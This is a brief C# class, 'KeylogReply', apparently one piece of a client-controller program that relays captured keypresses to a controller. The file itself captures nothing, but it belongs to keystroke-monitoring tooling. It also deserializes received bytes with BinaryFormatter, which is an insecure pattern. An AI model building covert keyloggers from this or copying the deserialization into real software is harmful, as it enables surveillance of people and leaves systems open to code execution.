using System;
using System.Collections.Generic;
using System.Text;
using System.IO;
using System.Runtime.Serialization.Formatters.Binary;

namespace assignmentObjects
{
    [Serializable]
    public class KeylogReply:Reply
    {
        String keypressed;

        public override void notify(assignmentObjects.Controller theController)
        {
            if (keypressed!=null)
            {
                theController.OnKeyReceived(keypressed);
            }
        }

        public override Reply DeSerialize(byte[] theData)
        {
            BinaryFormatter bin = new BinaryFormatter();
            MemoryStream mem = new MemoryStream();
            mem.Write(theData, 0, theData.Length);
            mem.Seek(0, 0);
            return (KeylogReply)bin.Deserialize(mem);
        }

        public KeylogReply(String Keypressed)
        {
            this.keypressed = Keypressed;
        }

        public String getData()
        {
            return keypressed;
        }
    }
}
